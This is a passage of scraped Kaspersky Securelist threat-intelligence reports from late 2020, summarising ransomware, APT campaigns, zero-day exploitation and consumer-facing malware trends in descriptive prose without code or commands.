computers that allows the malware to silently elevate its privileges using a known bypass technique.\n\nWastedLocker uses a combination of AES and RSA algorithms to encrypt files, which is a standard for ransomware families. Files are encrypted using a single public RSA key. This would be a weakness if this ransomware were to be distributed in mass attacks, since a decryptor from one victim would have to contain the only private RSA key that could be used to decrypt the files of all victims. However, since WastedLocker is used in attacks targeted at a specific organization, this decryption approach is worthless in real-world scenarios. Encrypted files are given the extension garminwasted_info, \u2013 and unusually, a new info file is created for each of the victim's encrypted files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/31084831/sl_WastedLocker_04.png>)\n\n### CactusPete's updated Bisonal backdoor\n\nCactusPete is a Chinese-speaking APT threat actor that has been active since 2013. The group has typically targeted military, diplomatic and infrastructure victims in Japan, South Korea, Taiwan and the U.S. However, more recently the group has shifted its focus more towards other Asian and Eastern European organizations.\n\nThis group, which we would characterize as having medium level technical capabilities, seems to have acquired greater support and has access to more complex code such as ShadowPad, which CactusPete deployed earlier this year against government, defence, energy, mining and telecoms organizations.\n\nNevertheless, the group continues to use less sophisticated tools. We recently reported the group's use of a [new variant of the Bisonal backdoor](<https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/>) to steal information, execute code on target computers and perform lateral movement within the network. Our research began with a single sample, but using the [Kaspersky Threat Attribution Engine](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>) (KTAE) we discovered more than 300 almost identical samples. All of these appeared between March 2019 and April this year \u2013 so the group has developed more than 20 samples per month! Bisonal is not advanced, relying instead on social engineering in the form of spear-phishing e-mails.\n\n### Operation PowerFall\n\nEarlier this year our technologies prevented an attack on a South Korean company. Our investigation uncovered two zero-day vulnerabilities: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. The exploits targeted the latest builds of Windows 10 and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nThe exploits operated in tandem. The victim was first targeted with a malicious script that, because of the vulnerability, was able to run in Internet Explorer. Then a flaw in the system service further escalated the privileges of the malicious process. As a result, the attackers were able to move laterally across the target network.\n\nWe reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for the elevation of privilege vulnerability (CVE-2020-0986): although, before our discovery, Microsoft hadn't considered exploitation of this vulnerability to be likely. The patch for this vulnerability was released on 9 June. The patch for the remote code vulnerability (CVE-2020-1380) was released on 11 August.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe named this malicious campaign Operation PowerFall. While we have been unable to find a clear link to known threat actors, we believe that DarkHotel might be behind it. You can read more about it [here](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) and [here](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>).\n\n### The latest activities of Transparent Tribe\n\nTransparent Tribe, a prolific threat actor that has been active since at least 2013, specializes in cyber-espionage. The group's main malware is a custom .NET Remote Access Trojan (RAT) called Crimson RAT, spread by means of spear-phishing e-mails containing malicious Microsoft Office documents.\n\nDuring [our investigation into the activities of Transparent Tribe](<https://securelist.com/transparent-tribe-part-1/98127/>), we found around 200 Crimson RAT samples. Kaspersky Security Network (KSN) telemetry indicates that there were more than a thousand victims in the year following June 2019. The main targets were diplomatic and military organizations in India and Pakistan.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19105713/sl_transparent_tribe_20.png>)\n\nCrimson RAT includes a range of functions for harvesting data from infected computers. The latest additions include a server-side component used to manage infected client machines and a USB worm component developed for stealing files from removable drives, spreading across systems by infecting removable media and downloading and executing a thin-client version of Crimson RAT from a remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19101103/sl_transparent_tribe_01.png>)\n\nWe also discovered a [new Android implant used by Transparent Tribe](<https://securelist.com/transparent-tribe-part-2/98233/>) to spy on mobile devices. The threat actor used social engineering to distribute the malware, disguised as a fake porn video player and a fake version of the Aarogya Setu COVID-19 tracking app developed by the government of India.\n\nThe app is a modified version of the AhMyth Android RAT, open source malware, downloadable from GitHub and built by binding a malicious payload inside legitimate apps. The malware is designed to collect information from the victim's device and send it to the attackers.\n\n### DeathStalker: mercenary cybercrime group\n\nIn August, we reported the activities of a cybercrime group that specializes in stealing trade secrets \u2013 mainly from fintech companies, law firms, and financial advisors, although we've also seen an attack on a diplomatic entity. The choice of targets suggests that this group, which we have named DeathStalker, is either looking for specific information to sell, or is a mercenary group offering an 'attack on demand' service. The group has been active since at least 2018; but it's possible that the group's activities could go back further, to 2012, and may be linked to the Janicab and Evilnum malware families.\n\nWe have seen Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the UK and the UAE. We also located Evilnum victims in Cyprus, India, Lebanon, Russia, Jordan and the UAE.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/25072903/Map_Powersing_Evilnum_upd.png>)\n\nThe group's use of a PowerShell implant called Powersing first brought DeathStalker to our attention. The operation starts with spear-phishing e-mails with attached archives containing a malicious LNK file. If the victim clicks on the archive, it starts a convoluted sequence resulting in the execution of arbitrary code on the computer\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145157/sl_decepticons_deathstalker_03.png>)\n\nPowersing periodically takes screenshots on the victim's computer and sends them to the C2 (Command and Control) server. It also executes additional PowerShell scripts that are downloaded from the C2 server. So Powersing is designed to provide the attackers with an initial point of presence on the infected computer from which to install additional malware.\n\nDeathStalker camouflages communication between infected computers and the C2 server by using public services as dead drop resolvers: these services allow the attackers to store data at a fixed URL through public posts, comments, user profiles, content descriptions, etc.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145258/sl_decepticons_deathstalker_04.png>)\n\nDeathStalker offers a good example of what small groups or even skilled individuals can achieve, without the need for innovative tricks or sophisticated methods. DeathStalker should serve as a baseline of what organizations in the private sector should be able to defend against, since groups of this sort represent the type of cyber-threat companies today are most likely to face. We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe: wherever possible, these utilities should be made unavailable. Security awareness training and security product assessments should also include infection chains based on LNK files.\n\nYou can read more about [DeathStalkers](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) here.\n\n## Other malware\n\n### The Tetrade: Brazilian banking malware goes global\n\nBrazil has a well-established criminal underground and local malware developers have created many banking Trojans over the years. Typically, this malware is used to target customers of local banks. However, Brazilian cybercriminals are starting to expand their attacks and operations abroad, targeting other countries and banks. [The Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>) is our designation for four large banking Trojan families that have been created, developed and spread by Brazilian criminals, but which are now being used at a global level. The four malware families are Guildma, Javali, Melcoz and Grandoreiro.\n\nWe have seen [attempts to do this before](<https://securelist.com/brazilian-trojans-beyond-borders/30879/>), with limited success using very basic Trojans. The situation is now different. Brazilian banking Trojans have evolved greatly, with hackers adopting techniques for bypassing detection, creating highly modular and obfuscated malware and using a very complex execution flow \u2013 making analysis more difficult. Notwithstanding the banking industry's adoption of technologies aimed at protecting customers, including the deployment of plugins, tokens, e-tokens, two-factor authentication, CHIP and PIN credit, fraud continues to increase because Brazil still lacks proper cybercrime legislation.\n\nBrazilian criminals are benefiting from the fact that many banks operating in Brazil also have operations elsewhere in Latin America and in Europe, making it easy to extend their attacks to customers of these financial institutions. They are also rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (Malware-as-a-Service) and quickly adding new techniques to their malware as a way to keep it relevant and financially attractive to their partners.\n\nThe banking Trojan families are seeking to innovate by using DGA (Domain Generation Algorithm), encrypted payloads, process hollowing, DLL hijacking, a lot of LoLBins, fileless infections and other tricks to obstruct analysis and detection. We believe that these threats will evolve to target more banks in more countries.\n\nWe recommend that financial institutions monitor these threats closely, while improving their authentication processes, boosting anti-fraud technology and threat intelligence data to understand and mitigate such risks. Further information on these threats, along with IoCs, YARA rules and hashes, are available to customers of our [Financial Threat Intelligence services](<https://www.kaspersky.com/enterprise-security/threat-intelligence>).\n\n### The dangers of streaming\n\nHome entertainment is changing as the adoption of streaming TV services increases. The global market for streaming services is [estimated to reach $688.7 billion by 2024](<https://www.businesswire.com/news/home/20200205005541/en/Global-Video-Streaming-Market-Estimated-Generate-688.7>). For cybercriminals, the widespread adoption of streaming services offers new, potentially lucrative attack vector. For example, just hours after Disney + was launched last November, [thousands of accounts were hacked](<https://www.zdnet.com/article/thousands-of-hacked-disney-accounts-are-already-for-sale-on-hacking-forums/>) and people's passwords and email details were changed. The criminals sold the compromised accounts online for between $3 and $11.\n\nEven established services, such as Netflix and Hulu, are prime targets for distributing malware, [stealing passwords](<https://www.usatoday.com/story/tech/columnist/2019/08/31/did-someone-steal-your-netflix-password/2168504001/>) and launching spam and phishing attacks. The spike in the number of subscribers in the wake of the COVID-19 pandemic has provided cybercriminals with an even bigger pool of potential victims. In the first quarter of this year, [Netflix added fifteen million subscribers](<https://www.theverge.com/2020/4/21/21229587/netflix-earnings-coronavirus-pandemic-streaming-entertainment%5d>)\u2014more than double what had been anticipated.\n\nWe took an [in-depth look at the threat landscape as it relates to streaming services](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>). Unsurprisingly, phishing is one of the approaches taken by cybercriminals, as they seek to trick people into disclosing login credentials or payment information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15124324/sl_tv_report_06.png>)\n\nThe criminals also capitalize on the growing interest in streaming services to distribute malware and adware. Typically, backdoors and other Trojans are downloaded when people attempt to gain access through unofficial means \u2013 by purchasing discounted accounts, obtaining a 'hack' to keep their free trial going, or attempting to access a free subscription. The chart below shows the number of people that encountered various threats containing the names of popular streaming platforms while trying to access these platforms through unofficial means between January 2019 and 8 April 2020:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15134838/01-en-graph-depicting.png>)\n\nThe chart below shows the mix of malicious programs disguised under the name of popular streaming platforms between January 2019 and 8 April 2020:\n\nYou can read the full report [here](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>), including our guidance on how to avoid phishing scams and malware related to streaming services.\n\n### Threats facing digital education\n\nOnline learning became the norm in the wake of the COVID-19 pandemic, as classrooms and lecture theatres were forced to close. Unfortunately, many educational institutions did not have proper cyber-security measures in place, putting online classrooms at increased risks of cyber-attacks. On 17 June, Microsoft Security Intelligence reported that the [education industry accounted for 61 percent of the 7.7 million malware encounters by enterprises](<https://edtechmagazine.com/k12/article/2020/06/cyberattacks-increasingly-threaten-schools-heres-what-know-perfcon>) in the previous 30 days \u2013 more than any other sector. In addition to malware, educational institutions also faced an increased risk of data breaches and violations of student privacy.\n\nWe recently published an overview of the threats facing schools and universities, including phishing related to online learning platforms and video conferencing applications, threats camouflaged as applications related to online learning and DDoS (Distributed Denial of Service) attacks affecting education.\n\nIn the first half of 2020, 168,550 people encountered various threats disguised as popular online learning platforms \u2013 a massive increase compared to just 820 in the same period the previous year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104901/02-en-education-report.png>)\n\nThe platform used most frequently as a lure was Zoom, with 99.5 per cent of detections, no surprise given the popularity of this platform.\n\nThe overwhelming majority of threats distributed under the guise of legitimate video conferencing and online learning platforms were riskware and adware. Adware bombards users with unwanted adverts, while riskware consists of various files \u2013 including browser bars, download managers and remote administration tools \u2013 that may carry out various actions without consent.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104938/03-en-education-report.png>)\n\nIn Q1 2020, the total number of DDoS attacks increased globally by 80 per cent when compared to the same period in 2019: and a large proportion of this increase can be attributed to attacks on distance e-learning services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03105019/04-en-education-report.png>)\n\nThe number of DDoS attacks affecting educational resources that occurred between January and June this year increased by at least 350 per cent when compared to the same period in 2019.\n\nIt's likely that online learning will continue to grow in the future and cybercriminals will seek to exploit this. So it's vital that educational institutions review their cyber-security policy and adopt appropriate measures to secure their online learning environments and resources.\n\nYou can read our full report [here](<https://securelist.com/digital-education-the-cyberrisks-of-the-online-classroom/98380/>).\n\n### Undeletable adware on smartphones\n\nWe've highlighted the issue of intrusive advertisements on smartphones a number of times in the past (you can find recent posts [here](<https://securelist.com/dropper-in-google-play/92496/>) and [here](<https://securelist.com/in-app-advertising-in-android/97065/>)). While it can be straightforward to remove [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), there are situations where it's much more difficult because the [adware is installed in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). In such cases, trying to remove it can cause the device to fail. In addition, ads can be embedded in undeletable system apps and libraries at the code level. According to our data, 14.8 per cent of all users attacked by malware or adware in the last year suffered an infection of the system partition.\n\nWe have observed two main strategies for introducing undeletable adware onto a device. First, the malware obtains root access and [installs adware in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). Second, the code for displaying ads (or its loader) gets into the firmware of the device even before reaches the consumer. Our data indicates that between one and 5 per cent people running our mobile security solutions have encountered this. In the main, these are owners of smartphones and tablets of certain brands in the lower price segment. For some popular vendors offering low-cost devices, this figure reaches 27 per cent.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/30143828/sl_pre-installed_ads_01.png>)\n\nSince the Android security model assumes that anti-virus is a normal app, it is unable to do anything [adware or malware in system directories](<https://securelist.com/pig-in-a-poke-smartphone-adware/97607/>), making this a serious problem.\n\nOur investigations show that the focus of some mobile device suppliers is on maximizing profits through all kinds of advertising tools, even if such tools cause inconvenience to device owners. If advertising networks are ready to pay for views, clicks, and installations regardless of their source, it makes sense for them to embed ad modules into devices to increase the profit from each device sold.", "modified": "2020-11-20T10:00:58", "published": "2020-11-20T10:00:58", "id": "SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "href": "https://securelist.com/it-threat-evolution-q3-2020/99382/", "type": "securelist", "title": "IT threat evolution Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such (COVID-19) to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, MosiacRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker is a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT 